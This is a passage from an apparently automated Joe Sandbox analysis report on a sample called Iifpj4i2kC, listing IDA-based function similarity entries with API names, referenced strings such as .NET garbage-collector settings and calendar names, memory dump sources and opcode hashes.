                                                                                                                                                                        • Instruction Fuzzy Hash: 5DE04F06E69107C5F90CBA665466BFAD3611F96740F245434EA2E9BB97ED2CA4028380
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2134602131.00007FF67FA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67FA40000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2134582345.00007FF67FA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2134699848.00007FF67FB29000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2134942464.00007FF67FB5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135069156.00007FF67FBCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff67fa40000_Iifpj4i2kC.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 334c71db2373eca22ed1fe030cc8b17200d83776fff50a61cfaf6ec7c3de23df
                                                                                                                                                                        • Instruction ID: 10a474a5e7b646a8f2422ed2c1db864a53de92361c37be728195d3a677d4dbae
                                                                                                                                                                        • Opcode Fuzzy Hash: 334c71db2373eca22ed1fe030cc8b17200d83776fff50a61cfaf6ec7c3de23df
                                                                                                                                                                        • Instruction Fuzzy Hash: A1D0A705F7401AC0EC046E274C15CB683642F47FC0D646131EC1EA7B97ED0CD4034384
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2134602131.00007FF67FA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67FA40000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2134582345.00007FF67FA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2134699848.00007FF67FB29000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2134942464.00007FF67FB5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135069156.00007FF67FBCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff67fa40000_Iifpj4i2kC.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _stricmp
                                                                                                                                                                        • String ID: buddhist$calendar$dangi$gregorian$hebrew$islamic$islamic-umalqura$japanese$persian$roc
                                                                                                                                                                        • API String ID: 2884411883-3649728362
                                                                                                                                                                        • Opcode ID: 5c4252158990072a2c8dbf7d618486f637b8a275c6e4f6a82dc01d2d222f2064
                                                                                                                                                                        • Instruction ID: 81a463ac0f9caec75f2dd293049cbdfef31d4148fa9193668a9c3ddc064d94dc
                                                                                                                                                                        • Opcode Fuzzy Hash: 5c4252158990072a2c8dbf7d618486f637b8a275c6e4f6a82dc01d2d222f2064
                                                                                                                                                                        • Instruction Fuzzy Hash: 21514B26A2C643D1FA609B15EC10FBA63D4AF89B84F416032DD0EC66A5EF6DE449C3C0
                                                                                                                                                                        APIs
                                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF67FA52967,?,?,?,?,00007FF67FA4B845), ref: 00007FF67FA4C1DE
                                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF67FA52967,?,?,?,?,00007FF67FA4B845), ref: 00007FF67FA4C206
                                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF67FA52967,?,?,?,?,00007FF67FA4B845), ref: 00007FF67FA4C226
                                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF67FA52967,?,?,?,?,00007FF67FA4B845), ref: 00007FF67FA4C246
                                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF67FA52967,?,?,?,?,00007FF67FA4B845), ref: 00007FF67FA4C266
                                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF67FA52967,?,?,?,?,00007FF67FA4B845), ref: 00007FF67FA4C28A
                                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF67FA52967,?,?,?,?,00007FF67FA4B845), ref: 00007FF67FA4C2AE
                                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF67FA52967,?,?,?,?,00007FF67FA4B845), ref: 00007FF67FA4C2D2
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2134602131.00007FF67FA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67FA40000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2134582345.00007FF67FA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2134699848.00007FF67FB29000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2134942464.00007FF67FB5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135069156.00007FF67FBCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff67fa40000_Iifpj4i2kC.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: strcmp
                                                                                                                                                                        • String ID: GCHeapHardLimit$GCHeapHardLimitLOH$GCHeapHardLimitLOHPercent$GCHeapHardLimitPOH$GCHeapHardLimitPOHPercent$GCHeapHardLimitPercent$GCHeapHardLimitSOH$GCHeapHardLimitSOHPercent
                                                                                                                                                                        • API String ID: 1004003707-945519297
                                                                                                                                                                        • Opcode ID: bd652d5be0480d2eb31566d04321b99b92d141b06253939b4d1c7caa1d773059
                                                                                                                                                                        • Instruction ID: e3630c72b13685c2b2e74c9795578bd554d8e36ab172b658ba72c1c7ad0a303c
                                                                                                                                                                        • Opcode Fuzzy Hash: bd652d5be0480d2eb31566d04321b99b92d141b06253939b4d1c7caa1d773059
                                                                                                                                                                        • Instruction Fuzzy Hash: F5410826A28A42C0FA50AB29A9409B55391AF46BF4F480371D87DD77E5EF6CE846C7C0
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2134602131.00007FF67FA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67FA40000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2134582345.00007FF67FA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2134699848.00007FF67FB29000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2134942464.00007FF67FB5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135069156.00007FF67FBCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff67fa40000_Iifpj4i2kC.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ContextInitialize$AddressEnabledErrorFeaturesHandleLastModuleProcState
                                                                                                                                                                        • String ID: InitializeContext2$kernel32.dll
                                                                                                                                                                        • API String ID: 4102459504-3117029998
                                                                                                                                                                        • Opcode ID: bf7d35e48df714c612ab66266faaa2ff6652ce620ea3f11c073d427a00be551f
                                                                                                                                                                        • Instruction ID: 3d4173e9ddd928dcb2c3127f4284827788a7431f16c1ab45230a401d865c34e1
                                                                                                                                                                        • Opcode Fuzzy Hash: bf7d35e48df714c612ab66266faaa2ff6652ce620ea3f11c073d427a00be551f
                                                                                                                                                                        • Instruction Fuzzy Hash: A0312D23A29B46C2FA119FAAF440A7A6394EF45BD4F480435DD4D837A4DF7CE486C790
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2134602131.00007FF67FA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67FA40000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2134582345.00007FF67FA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2134699848.00007FF67FB29000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2134942464.00007FF67FB5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135069156.00007FF67FBCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff67fa40000_Iifpj4i2kC.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Thread$AddressContextErrorLastLibraryLoadProcResumeSuspend
                                                                                                                                                                        • String ID: QueueUserAPC2$kernel32
                                                                                                                                                                        • API String ID: 3714266957-4022151419
                                                                                                                                                                        • Opcode ID: bc70cecf5c74af7520f56920f6343e2be3003b4f5f30e659a0aacf61ab6d3dce
                                                                                                                                                                        • Instruction ID: 124668e94336fc6f8789789c42da05f21c7efa18ddf0b0dbc15473226c3b742a
                                                                                                                                                                        • Opcode Fuzzy Hash: bc70cecf5c74af7520f56920f6343e2be3003b4f5f30e659a0aacf61ab6d3dce
                                                                                                                                                                        • Instruction Fuzzy Hash: EE316422A28B42C1EA509B1EE844B7A23A1AF46FE4F540231DD6DD7AE4DF3CE445C780
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2134602131.00007FF67FA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67FA40000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2134582345.00007FF67FA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2134699848.00007FF67FB29000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2134942464.00007FF67FB5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135069156.00007FF67FBCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff67fa40000_Iifpj4i2kC.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: fe6e69181591d6301f79addf1851dae84baba91a0e20fc1957c0ed45eea2809c
                                                                                                                                                                        • Instruction ID: 6711687e0f5c0788f70bb902a983d19b06d6993c5bbbf066085997045363c347
                                                                                                                                                                        • Opcode Fuzzy Hash: fe6e69181591d6301f79addf1851dae84baba91a0e20fc1957c0ed45eea2809c
                                                                                                                                                                        • Instruction Fuzzy Hash: 2671D163A29782C2FB549F299540ABA63E4BF55BD4F184135EA1D87B96EF3CE440C3C0
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2134602131.00007FF67FA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67FA40000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2134582345.00007FF67FA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2134699848.00007FF67FB29000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2134942464.00007FF67FB5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135069156.00007FF67FBCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff67fa40000_Iifpj4i2kC.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: BreakDebug
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 456121617-0
                                                                                                                                                                        • Opcode ID: 5d73b6675c1853df630bb6c88506b6e80ad5f9561737fbd2e3aae4c93d19f0ff
                                                                                                                                                                        • Instruction ID: e3a0f0a5ca25afb8f0fc0d3e06e81dc411ebbb9bde10d598b843e399f66b578b
                                                                                                                                                                        • Opcode Fuzzy Hash: 5d73b6675c1853df630bb6c88506b6e80ad5f9561737fbd2e3aae4c93d19f0ff
                                                                                                                                                                        • Instruction Fuzzy Hash: 9E51C363B29A83C6EB56DB55C440ABD67A1FF85BA4F46413ACA1D83391DE7CE481C3C0
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2134602131.00007FF67FA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67FA40000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2134582345.00007FF67FA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2134699848.00007FF67FB29000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2134942464.00007FF67FB5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135069156.00007FF67FBCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff67fa40000_Iifpj4i2kC.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CriticalSectionSwitchThread$Leave$Enter
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1765607624-0
                                                                                                                                                                        • Opcode ID: faad790ec28286bda2ef36a915e46beff94c7fcad6aaa131053e1d9cfa2025f0
                                                                                                                                                                        • Instruction ID: bdf7585e3731b869b6dd507a1e764527e2a9f9895b99c6baa393f2cc4bac39ab
                                                                                                                                                                        • Opcode Fuzzy Hash: faad790ec28286bda2ef36a915e46beff94c7fcad6aaa131053e1d9cfa2025f0
                                                                                                                                                                        • Instruction Fuzzy Hash: 44510833E38203C6FA549B6DAC51D7A23D1AF46B54F540235F56DC22E2EE2CB845D6C2
                                                                                                                                                                        APIs
                                                                                                                                                                        • DebugBreak.KERNEL32(?,?,?,?,?,?,00007FF67FA81FB1,?,?,0000028DE53A8090,00007FF67FA814E2), ref: 00007FF67FA81E89
                                                                                                                                                                        • DebugBreak.KERNEL32(?,?,?,?,?,?,00007FF67FA81FB1,?,?,0000028DE53A8090,00007FF67FA814E2), ref: 00007FF67FA81EA1
                                                                                                                                                                        • DebugBreak.KERNEL32(?,?,?,?,?,?,00007FF67FA81FB1,?,?,0000028DE53A8090,00007FF67FA814E2), ref: 00007FF67FA81EB9
                                                                                                                                                                        • DebugBreak.KERNEL32(?,?,?,?,?,?,00007FF67FA81FB1,?,?,0000028DE53A8090,00007FF67FA814E2), ref: 00007FF67FA81ED7
                                                                                                                                                                        • DebugBreak.KERNEL32(?,?,?,?,?,?,00007FF67FA81FB1,?,?,0000028DE53A8090,00007FF67FA814E2), ref: 00007FF67FA81EFC
                                                                                                                                                                        • DebugBreak.KERNEL32 ref: 00007FF67FA81F30
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2134602131.00007FF67FA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67FA40000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2134582345.00007FF67FA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2134699848.00007FF67FB29000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2134942464.00007FF67FB5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135069156.00007FF67FBCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff67fa40000_Iifpj4i2kC.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: BreakDebug
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 456121617-0
                                                                                                                                                                        • Opcode ID: eb5a1da3c55d9acfe23894c72031d4decde521b88f1bcb182cc320728f4e60f2
                                                                                                                                                                        • Instruction ID: ec049c0d1115669003ddac05c920691427e244c4256fee6c57c74383c8157338
                                                                                                                                                                        • Opcode Fuzzy Hash: eb5a1da3c55d9acfe23894c72031d4decde521b88f1bcb182cc320728f4e60f2
                                                                                                                                                                        • Instruction Fuzzy Hash: F141F863A286C2C2E792AF609000A7E67D1FF45BA4F180034EE4D97696CF7CE880C3D1
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2134602131.00007FF67FA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67FA40000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2134582345.00007FF67FA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2134699848.00007FF67FB29000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2134942464.00007FF67FB5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135069156.00007FF67FBCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff67fa40000_Iifpj4i2kC.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Current$Thread$DuplicateExceptionFailFastHandleProcessQueryRaiseVirtual
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 510365852-3916222277
                                                                                                                                                                        • Opcode ID: 9ced71184ac91c8616e97de7930c93111042d63eeb25a1540481694c845d8b19
                                                                                                                                                                        • Instruction ID: 803a8c0a85031d8a487f3c77392b37c8e8e514e3928d7bb2bfe17150e8c059be
                                                                                                                                                                        • Opcode Fuzzy Hash: 9ced71184ac91c8616e97de7930c93111042d63eeb25a1540481694c845d8b19
                                                                                                                                                                        • Instruction Fuzzy Hash: CC118E73618B81CAD760EF29B4405AAB3A1FB457B4F144334E6BD8B6D6CF78D0428780
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2134602131.00007FF67FA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67FA40000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2134582345.00007FF67FA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2134699848.00007FF67FB29000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2134942464.00007FF67FB5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135069156.00007FF67FBCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff67fa40000_Iifpj4i2kC.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CriticalSection$EnterLeave
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3168844106-0
                                                                                                                                                                        • Opcode ID: 30c2a865ca8bebd16377ec9e55b12350cbbdee7e357ec5e7fec82702041c0912
                                                                                                                                                                        • Instruction ID: c67c034f91ed65a1077cf6da3c7d35868f2b8507d48ad6d7a0001a3a29bb0d35
                                                                                                                                                                        • Opcode Fuzzy Hash: 30c2a865ca8bebd16377ec9e55b12350cbbdee7e357ec5e7fec82702041c0912
                                                                                                                                                                        • Instruction Fuzzy Hash: 02616E63A28B82C4EA509F15E840FB663A0AF96B94F585236D98CC3765DF3CE485C3D0
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2134602131.00007FF67FA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67FA40000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2134582345.00007FF67FA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2134699848.00007FF67FB29000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2134942464.00007FF67FB5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135069156.00007FF67FBCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff67fa40000_Iifpj4i2kC.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CriticalSection$EnterLeave
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3168844106-0
                                                                                                                                                                        • Opcode ID: 7f292bd782e5db76287a58f2738b6682abde35b80ac547e9518716b401c7d407
                                                                                                                                                                        • Instruction ID: fbf90ef018d37ef748494e3d077524b8668c7814e3c7542c0e9c2c97ecfe84db
                                                                                                                                                                        • Opcode Fuzzy Hash: 7f292bd782e5db76287a58f2738b6682abde35b80ac547e9518716b401c7d407
                                                                                                                                                                        • Instruction Fuzzy Hash: 67514F73A2CB8281EA609F10E840BB673A4EFA5B94F585236D98DC3655DF3CE095C790
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2134602131.00007FF67FA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67FA40000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2134582345.00007FF67FA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2134699848.00007FF67FB29000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2134942464.00007FF67FB5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135069156.00007FF67FBCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff67fa40000_Iifpj4i2kC.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ExceptionFailFastRaise
                                                                                                                                                                        • String ID: Process is terminating due to StackOverflowException.
                                                                                                                                                                        • API String ID: 2546344036-2200901744
                                                                                                                                                                        • Opcode ID: 8c7f27cb811299753a952a27045d38bbe572bc9dae65ba32a05ed8a71e85e72f
                                                                                                                                                                        • Instruction ID: 82e8830466705c0c934fe99f18828132aca2af594a1e8e3136abc016e064862a
                                                                                                                                                                        • Opcode Fuzzy Hash: 8c7f27cb811299753a952a27045d38bbe572bc9dae65ba32a05ed8a71e85e72f
                                                                                                                                                                        • Instruction Fuzzy Hash: 2B51A127E29742C1FE509B19D490B7A63A0EF48BD4F448132DA5EC77A0DF6CE495A380
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2134602131.00007FF67FA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67FA40000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2134582345.00007FF67FA40000.00000002.00000001.01000000.00000003.sdmpDownload File
